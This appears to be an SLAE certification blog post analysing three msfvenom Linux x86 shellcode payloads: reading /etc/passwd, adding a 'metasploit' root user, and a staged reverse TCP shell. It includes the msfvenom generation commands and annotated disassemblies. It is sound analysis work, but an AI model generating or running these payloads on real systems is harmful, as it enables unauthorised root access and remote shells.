SLAE 5: Analyzing shellcode generated by msfvenom

Programming / January 25, 2020 • 14 min read
Tags: slae shellcoding

In this article, I will analyse three shellcode samples generated by msfvenom, specifically:

  • linux/x86/read_file
  • linux/x86/adduser
  • linux/x86/shell/reverse_tcp
msfvenom --list payloads -a x86 --platform linux

Let’s see if there is something new we can learn from these samples :)

Analyzing linux/x86/read_file

First, we generate the executable like so:

msfvenom -p linux/x86/read_file -a x86 --platform linux PATH=/etc/passwd FD=2 -f elf -o read_file

I set the payload options PATH and FD to /etc/passwd and 2. Executing the program outputs the contents of /etc/passwd.

dubs3c@slae:~/SLAE/EXAM/github/assignment_5$ ./read_file

Now that we know that the payload works, we can start analyzing it using a few simple tools.

With ndisasm we can disassemble the binary and analyze the assembly code.

 1dubs3c@slae:~/SLAE/EXAM/github/assignment_5$ msfvenom -p linux/x86/read_file -a x86 --platform linux PATH=/etc/passwd FD=2 -f raw | ndisasm -u -
 2No encoder specified, outputting raw payload
 3Payload size: 73 bytes
 500000000  EB36              jmp short 0x38
 600000002  B805000000        mov eax,0x5
 700000007  5B                pop ebx
 800000008  31C9              xor ecx,ecx
 90000000A  CD80              int 0x80
100000000C  89C3              mov ebx,eax
110000000E  B803000000        mov eax,0x3
1200000013  89E7              mov edi,esp
1300000015  89F9              mov ecx,edi
1400000017  BA00100000        mov edx,0x1000
150000001C  CD80              int 0x80
160000001E  89C2              mov edx,eax
1700000020  B804000000        mov eax,0x4
1800000025  BB02000000        mov ebx,0x2
190000002A  CD80              int 0x80
200000002C  B801000000        mov eax,0x1
2100000031  BB00000000        mov ebx,0x0
2200000036  CD80              int 0x80
2300000038  E8C5FFFFFF        call dword 0x2
240000003D  2F                das
250000003E  657463            gs jz 0xa4
2600000041  2F                das
2700000042  7061              jo 0xa5
2800000044  7373              jnc 0xb9
2900000046  7764              ja 0xac
3000000048  00                db 0x00

Looking at the assembly output we can immediately recognize kernel interrupt instructions (int x80), meaning the program is making use of syscalls. The specific syscall being called is often defined in eax and any arguments are placed in ebx, ecx, edx.

The first instruction is a jump to 0x38, following the jump to address 00000038 we see that the next instruction is call dword 0x2. A call instruction will push the address of the next instruction to the stack. The call takes us back to the beginning of the shellcode, next instruction is mov eax, 0x5 at address 00000002. Placing 0x5 in eax specifies which syscall to execute. Checking in usr/include/i386-linux-gnu/asm/unistd_32.h which syscall corresponds to 0x5 returned:

#define __NR_restart_syscall 0
#define __NR_exit 1
#define __NR_fork 2
#define __NR_read 3
#define __NR_write 4
#define __NR_open 5
#define __NR_close 6
#define __NR_waitpid 7
#define __NR_creat 8
#define __NR_link 9
#define __NR_unlink 10

The syscall is __NR_open 5. Running man 2 open reveals the following syntax for open:

2int open(const char *pathname, int flags);
3int open(const char *pathname, int flags, mode_t mode);

The first argument is the file path, next two arguments are flags and which mode that should be used. The pop ebx instruction pops the address on top of the stack into the ebx register. Now what does this address point to? Well, let’s check what the hex values after the call instruction converts to:

2F 657463 2F 7061 7373 7764 00 = /etc/passwd\0

The file that we want to open :)

100000002  B805000000        mov eax,0x5     ; open() syscall
200000007  5B                pop ebx         ; filepath to open
300000008  31C9              xor ecx,ecx     ; zero
40000000A  CD80              int 0x80        ; execute syscall

The next argument (flags) is 0 because xor ecx, ecx returns zero. Finally the syscall is executed and the result is stored in eax, which is a file descriptor.

Next section actually reads the contents of the file. This is done by moving the previous result (the file descriptor) into ebx which is the first argument for the READ syscall. 0x3 which corresponds to the read() syscall, is placed in eax. ecx contains the address where the contents will be stored, while edx indicates how many bytes to read, which is this case is 4096 (0x1000). READ will return the number of bytes read into eax.

10000000C  89C3              mov ebx,eax         ; FD from open()
20000000E  B803000000        mov eax,0x3         ; read() syscall
300000013  89E7              mov edi,esp
400000015  89F9              mov ecx,edi         ; where to store contents
500000017  BA00100000        mov edx,0x1000      ; read 4096 bytes
60000001C  CD80              int 0x80            ; execute syscall

The final section writes the contents to STDOUT and then exits the program. The first four instructions sets up the write() syscall by placing 0x4 into eax, setting the first argument to 0x2 which is STDOUT and finally sets how many bytes to write in edx. The following three instructions simply exits the program by setting eax to the EXIT syscall.

10000001E  89C2              mov edx,eax         ; bytes read from read() syscall
200000020  B804000000        mov eax,0x4         ; write() syscall
300000025  BB02000000        mov ebx,0x2         ; write to STDOUT
40000002A  CD80              int 0x80            ; execute syscall
50000002C  B801000000        mov eax,0x1         ; exit() syscall
600000031  BB00000000        mov ebx,0x0         ; no error
700000036  CD80              int 0x80            ; execute syscall

You can also inspect the binary by running it with strace, which shows you all the functions invocations and values:

dubs3c@slae:~/SLAE/EXAM/github/assignment_5$ strace ./read_file
execve("./read_file", ["./read_file"], [/* 22 vars */]) = 0
open("/etc/passwd", O_RDONLY)           = 3
read(3, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 1888
write(2, "root:x:0:0:root:/root:/bin/bash\n"..., 1888root:x:0:0:root:/root:/bin/bash

Now we have finished analyzing the first shellcode created by msfvenom, let’s move on to the next one!


Next payload generated by msfvenom is the adduser shellcode. Let’s start by examining the first five instructions.

 100000000  31C9              xor ecx,ecx
 200000002  89CB              mov ebx,ecx
 300000004  6A46              push byte +0x46
 400000006  58                pop eax
 500000007  CD80              int 0x80
 600000009  6A05              push byte +0x5
 70000000B  58                pop eax
 80000000C  31C9              xor ecx,ecx
 90000000E  51                push ecx
100000000F  6873737764        push dword 0x64777373
1100000014  682F2F7061        push dword 0x61702f2f
1200000019  682F657463        push dword 0x6374652f
130000001E  89E3              mov ebx,esp
1400000020  41                inc ecx
1500000021  B504              mov ch,0x4
1600000023  CD80              int 0x80
1700000025  93                xchg eax,ebx
1800000026  E828000000        call dword 0x53
190000002B  6D                insd
200000002C  657461            gs jz 0x90
210000002F  7370              jnc 0xa1
2200000031  6C                insb
2300000032  6F                outsd
2400000033  69743A417A2F6449  imul esi,[edx+edi+0x41],dword 0x49642f7a
250000003B  736A              jnc 0xa7
260000003D  3470              xor al,0x70
270000003F  3449              xor al,0x49
2800000041  52                push edx
2900000042  633A              arpl [edx],di
3000000044  303A              xor [edx],bh
3100000046  303A              xor [edx],bh
3200000048  3A2F              cmp ch,[edi]
330000004A  3A2F              cmp ch,[edi]
340000004C  62696E            bound ebp,[ecx+0x6e]
350000004F  2F                das
3600000050  7368              jnc 0xba
3700000052  0A598B            or bl,[ecx-0x75]
3800000055  51                push ecx
3900000056  FC                cld
4000000057  6A04              push byte +0x4
4100000059  58                pop eax
420000005A  CD80              int 0x80
430000005C  6A01              push byte +0x1
440000005E  58                pop eax
450000005F  CD80              int 0x80

We can see that the last instruction is a kernel interrupt instruction, indicating that a syscall is going be made. The syscall number is placed in eax. The value is 0x46 which first pushed onto the stack, which is immediately poped into eax. By looking in /usr/include/i386-linux-gnu/asm/unistd_32.h we can see which syscall corresponds to 46.

100000000  31C9              xor ecx,ecx         ; zero out ecx
200000002  89CB              mov ebx,ecx         ; ebx is now zero
300000004  6A46              push byte +0x46
400000006  58                pop eax             ; setgid() syscall
500000007  CD80              int 0x80            ; execute syscall

As we can see below, it’s setgid().

#define __NR_prof 44
#define __NR_brk 45
#define __NR_setgid 46
#define __NR_getgid 47
#define __NR_signal 48

Running man 2 setgid tells us the syntax of the function and its description. The function only has one argument which is set to zero which we can see in the first two instructions.

       #include <sys/types.h>
       #include <unistd.h>

       int setgid(gid_t gid);

       setgid() sets the effective group ID of the calling process.  If the caller is the superuser, the real GID and saved set-group-ID are also set.

The next section has a little more going on, we can see that there are twelve bytes being pushed onto the stack. Decoding 2f6574632f2f706173737764 reveals /etc//passwd. The first instruction also pushes 0x5 onto the stack, which is again immediately poped into eax. We know from the previous shellcode that this value corresponds to the syscall open(). Now it’s clear that this section opens the file /etc/passwd and returns a file descriptor, as seen in the previous payload.

 100000009  6A05              push byte +0x5
 20000000B  58                pop eax                 ; open() syscall
 30000000C  31C9              xor ecx,ecx             ; zero out ecx
 40000000E  51                push ecx                ; null terminator
 50000000F  6873737764        push dword 0x64777373
 600000014  682F2F7061        push dword 0x61702f2f
 700000019  682F657463        push dword 0x6374652f   ; etc//passwd
 80000001E  89E3              mov ebx,esp             ; ebx points to filepath
 900000020  41                inc ecx                 ; increment ecx, is now 1
1000000021  B504              mov ch,0x4              ; move 0x4 to ecx
1100000023  CD80              int 0x80                ; execute syscall

Now comes the juicy part, modifying /etc/passwd. Everything after address 00000026 looks like gibberish, and the fact that there is a call instruction makes me believe that this is a call-pop technique that we have seen in the previous example. For this last part, I will use GDB to analyze how the program adds a new user to the system.

 100000025  93                xchg eax,ebx        ; change the value in eax to ebx and vice verca. ebx now contains the FD
 200000026  E828000000        call dword 0x53
 30000002B  6D                insd
 40000002C  657461            gs jz 0x90
 50000002F  7370              jnc 0xa1
 600000031  6C                insb
 700000032  6F                outsd
 800000033  69743A417A2F6449  imul esi,[edx+edi+0x41],dword 0x49642f7a
 90000003B  736A              jnc 0xa7
100000003D  3470              xor al,0x70
110000003F  3449              xor al,0x49
1200000041  52                push edx
1300000042  633A              arpl [edx],di
1400000044  303A              xor [edx],bh
1500000046  303A              xor [edx],bh
1600000048  3A2F              cmp ch,[edi]
170000004A  3A2F              cmp ch,[edi]
180000004C  62696E            bound ebp,[ecx+0x6e]
190000004F  2F                das
2000000050  7368              jnc 0xba
2100000052  0A598B            or bl,[ecx-0x75]
2200000055  51                push ecx
2300000056  FC                cld
2400000057  6A04              push byte +0x4
2500000059  58                pop eax
260000005A  CD80              int 0x80

The binary is stripped from any debug symbols, but we can use readelf to get the entry point of the program. With this information we can debug the program.

dubs3c@slae:~/SLAE/EXAM/github/assignment_5$ readelf -h add_user
ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF32
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x8048054
  Start of program headers:          52 (bytes into file)
  Start of section headers:          0 (bytes into file)
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         1
  Size of section headers:           0 (bytes)
  Number of section headers:         0
  Section header string table index: 0

Loading the binary with GDB and setting necessary breakpoints gives shows us the disassembled binary.

 1dubs3c@slae:~/SLAE/EXAM/github/assignment_5$ gdb -q add_user
 2Reading symbols from /home/dubs3c/SLAE/EXAM/github/assignment_5/add_user...(no debugging symbols found)...done.
 3(gdb) b *0x8048054
 4Breakpoint 1 at 0x8048054
 5(gdb) r
 6Starting program: /home/dubs3c/SLAE/EXAM/github/assignment_5/add_user
 8Breakpoint 1, 0x08048054 in ?? ()
 9(gdb) disas 0x8048054, 0x8048054+97
10Dump of assembler code from 0x8048054 to 0x80480b5:
11=> 0x08048054:  xor    ecx,ecx
12   0x08048056:  mov    ebx,ecx
13   0x08048058:  push   0x46
14   0x0804805a:  pop    eax
15   0x0804805b:  int    0x80
16   0x0804805d:  push   0x5
17   0x0804805f:  pop    eax
18   0x08048060:  xor    ecx,ecx
19   0x08048062:  push   ecx
20   0x08048063:  push   0x64777373
21   0x08048068:  push   0x61702f2f
22   0x0804806d:  push   0x6374652f
23   0x08048072:  mov    ebx,esp
24   0x08048074:  inc    ecx
25   0x08048075:  mov    ch,0x4
26   0x08048077:  int    0x80
27   0x08048079:  xchg   ebx,eax
28   0x0804807a:  call   0x80480a7
29   0x0804807f:  ins    DWORD PTR es:[edi],dx
30   0x08048080:  gs
31   0x08048081:  je     0x80480e4
32   0x08048083:  jae    0x80480f5
33   0x08048085:  ins    BYTE PTR es:[edi],dx
34   0x08048086:  outs   dx,DWORD PTR ds:[esi]
35   0x08048087:  imul   esi,DWORD PTR [edx+edi*1+0x41],0x49642f7a
36   0x0804808f:  jae    0x80480fb
37   0x08048091:  xor    al,0x70
38   0x08048093:  xor    al,0x49
39   0x08048095:  push   edx
40   0x08048096:  arpl   WORD PTR [edx],di
41   0x08048098:  xor    BYTE PTR [edx],bh
42   0x0804809a:  xor    BYTE PTR [edx],bh
43   0x0804809c:  cmp    ch,BYTE PTR [edi]
44   0x0804809e:  cmp    ch,BYTE PTR [edi]
45   0x080480a0:  bound  ebp,QWORD PTR [ecx+0x6e]
46   0x080480a3:  das
47   0x080480a4:  jae    0x804810e
48   0x080480a6:  or     bl,BYTE PTR [ecx-0x75]
49   0x080480a9:  push   ecx
50   0x080480aa:  cld
51   0x080480ab:  push   0x4
52   0x080480ad:  pop    eax
53   0x080480ae:  int    0x80
54   0x080480b0:  push   0x1
55   0x080480b2:  pop    eax
56   0x080480b3:  int    0x80
57End of assembler dump.

We are interested in the following instruction 0x0804807a: call 0x80480a7. Let’s set a breakpoint and step to the next instruction to see where we land!

(gdb) b *0x0804807a
Breakpoint 2 at 0x804807a
(gdb) c

Breakpoint 2, 0x0804807a in ?? ()
(gdb) ni
0x080480a7 in ?? ()
(gdb) x/8i $pc                                                                                                                        => 0x80480a7:   pop    ecx
   0x80480a8:   mov    edx,DWORD PTR [ecx-0x4]
   0x80480ab:   push   0x4
   0x80480ad:   pop    eax      ; write() syscall
   0x80480ae:   int    0x80     ; execute syscall
   0x80480b0:   push   0x1
   0x80480b2:   pop    eax      ; exit() syscall
   0x80480b3:   int    0x80     ; execute syscall, exit program
(gdb) ni
0x080480a8 in ?? ()
(gdb) x/s  $ecx
0x804807f:      "metasploit:Az/dIsj4p4IRc:0:0::/:/bin/sh\nY\213Q\374j\004Xj\001X"
(gdb) x/x $ecx-4
0x804807b:      0x28

As can be seen in the above GDB output, the gibberish data was actually a string containing the new username and password. This string will be written to /etc/passwd. The string was popped into ecx because of the call instruction that pushed the address of the following instruction onto the stack. edx contains the amount of bytes to write, the instruction that computes this is at address 0x80480a8. Completing the program inserts a new user called metasploit (password is metasploit) to the system:

dubs3c@slae:~/SLAE/EXAM/github/assignment_5$ grep metasploit /etc/passwd

Should be noted that the binary needs to be run as root, since it’s adding a root user.


For the final paylaod, we’ll analyze linux/x86/shell/reverse_tcp which can be generated with:

$ msfvenom -p linux/x86/shell/reverse_tcp -a x86 --platform linux lhost= lport=1337 -f elf -o build/reverse_tcp

A reverse shell will send a local shell to a remote server, often controlled by an attacker. Let’s begin analyzing with ndisasm again.

 1dubs3c@slae:~/SLAE/EXAM/github/assignment_5$ msfvenom -p linux/x86/shell/reverse_tcp -a x86 --platform linux lhost= lport=1337 -f raw | ndisasm -u -
 2No encoder specified, outputting raw payload
 3Payload size: 123 bytes
 500000000  6A0A              push byte +0xa
 600000002  5E                pop esi                 ; 10 connection attempts
 700000003  31DB              xor ebx,ebx
 800000005  F7E3              mul ebx
 900000007  53                push ebx                ; socket protocol: 0
1000000008  43                inc ebx                 ; SYS_SOCKET
1100000009  53                push ebx                ; socket type: SOCK_STREAM = 1
120000000A  6A02              push byte +0x2          ; socket domain: PF_INET = 2
130000000C  B066              mov al,0x66             ; socketcall()
140000000E  89E1              mov ecx,esp             ; socket() arguments used in second parameter for socketcall
1500000010  CD80              int 0x80
1600000012  97                xchg eax,edi
1700000013  5B                pop ebx
1800000014  68C0A80114        push dword 0x1401a8c0   ;
1900000019  6802000539        push dword 0x39050002   ; 1337
200000001E  89E1              mov ecx,esp             ; sockaddr struct
2100000020  6A66              push byte +0x66         ; socketcall()
2200000022  58                pop eax
2300000023  50                push eax
2400000024  51                push ecx
2500000025  57                push edi
2600000026  89E1              mov ecx,esp             ; connect() arguments used in second parameter for socketcall
2700000028  43                inc ebx                 ; SYS_CONNECT
2800000029  CD80              int 0x80                ; Execute syscall
290000002B  85C0              test eax,eax            ; Test if connect() returned success
300000002D  7919              jns 0x48                ; If not zero, jump to 00000048
310000002F  4E                dec esi                 ; Decrease esi
3200000030  743D              jz 0x6f                 ; If zero, exit program
3300000032  68A2000000        push dword 0xa2
3400000037  58                pop eax                 ; syscall sys_nanosleep 162
3500000038  6A00              push byte +0x0          ; timespec structure tv_nsec
360000003A  6A05              push byte +0x5          ; timespec structure tv_sec -> Sleep 5 seconds
370000003C  89E3              mov ebx,esp             ; ebx points to timespec structure
380000003E  31C9              xor ecx,ecx             ; last argument for sys_nanosleep is zero
3900000040  CD80              int 0x80                ; Execute syscall
4000000042  85C0              test eax,eax
4100000044  79BD              jns 0x3                 ; if not zero jump to 00000003
4200000046  EB27              jmp short 0x6f          ; exit program
4300000048  B207              mov dl,0x7              ; reverse shell success fully connected. 7 -> read,write,execute
440000004A  B900100000        mov ecx,0x1000          ; size_t len 4096
450000004F  89E3              mov ebx,esp             ; *addr = points to top of the stack
4600000051  C1EB0C            shr ebx,0xc             ; shift ebx 12 bytes to the right
4700000054  C1E30C            shl ebx,0xc             ; shift ebx 12 bytes to the left
4800000057  B07D              mov al,0x7d             ; sys_mprotect 125
4900000059  CD80              int 0x80                ; Execute syscall
500000005B  85C0              test eax,eax            ; Test if mprotect() returned success
510000005D  7810              js 0x6f                 ; If zero, exit program
520000005F  5B                pop ebx                 ; file descriptor for read()
5300000060  89E1              mov ecx,esp             ; move stack pointer to ecx = void *buf
5400000062  99                cdq                     ; 
5500000063  B224              mov dl,0x24             ; size_t count = 36 bytes
5600000065  B003              mov al,0x3              ; sys_read 03
5700000067  CD80              int 0x80                ; Execute syscall
5800000069  85C0              test eax,eax            ; Test if read() returned success
590000006B  7802              js 0x6f                 ; If not zero, exit program
600000006D  FFE1              jmp ecx                 ; Loop back to ecx
610000006F  B801000000        mov eax,0x1             ; sys_exit 01
6200000074  BB01000000        mov ebx,0x1             ; Set return value to error
6300000079  CD80              int 0x80                ; Execute syscall

Compared to other common reverse shell payloads, this one is a little bit different because it performs error checking after each syscall. If an error is detected, simply exit the program. In addition to error checking, it contains a few other features as well. The program will try to connect 10 times before it exits. Between each connection attempt it will also sleep for 5 seconds. Once a connection has been made, mprotect() is called marking the top of the stack readable, writable and executable for the process’s memory pages.

We can dynamically analyse the payload using strace to see which system calls are being made. Because this payload expects shellcode as input, I simply used metasploit’s exploit/multi/handler to listen for connections. The image below shows strace on the left and metasploit on the right.


The green line shows the shellcode received from metasploit. Following the strace output, we can see that the shellcode performs an execve() syscall, executing /bin/sh and finally running the command id, sent from metasploit’s terminal.

Another tool we can use for analyzing shellcode is sctest which can be used for emulating shellcode. Running the following commands will create a graphical image showing which syscalls are being made.

dubs3c@slae:~/SLAE/EXAM/github/assignment_5$ msfvenom -p linux/x86/shell/reverse_tcp -a x86 --platform linux lhost= lport=1337 -f raw | ~/SLAE/libemu/tools/sctest/sctest -vvv -Ss 100000 -G
dubs3c@slae:~/SLAE/EXAM/github/assignment_5$ dot -Tpng -o reverse_tcp.png

The generated image:

reverse tcp with sctest

In addition to generating images, sctest will also generate some C code based on the structures used by each syscall. For example, the C code below corresponds to creating a socket and then calling the connect syscall. We can also see the configured port and IP address.

 1int socket (
 2     int domain = 2;
 3     int type = 1;
 4     int protocol = 0;
 5) =  14;
 6int connect (
 7     int sockfd = 14;
 8     struct sockaddr_in * serv_addr = 0x00416fbe =>
 9         struct   = {
10             short sin_family = 2;
11             unsigned short sin_port = 14597 (port=1337);
12             struct in_addr sin_addr = {
13                 unsigned long s_addr = 335653056 (host=;
14             };
15             char sin_zero = "       ";
16         };
17     int addrlen = 102;
18) =  0;

That’s it, this was a fun payload to dissect :)

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE-1490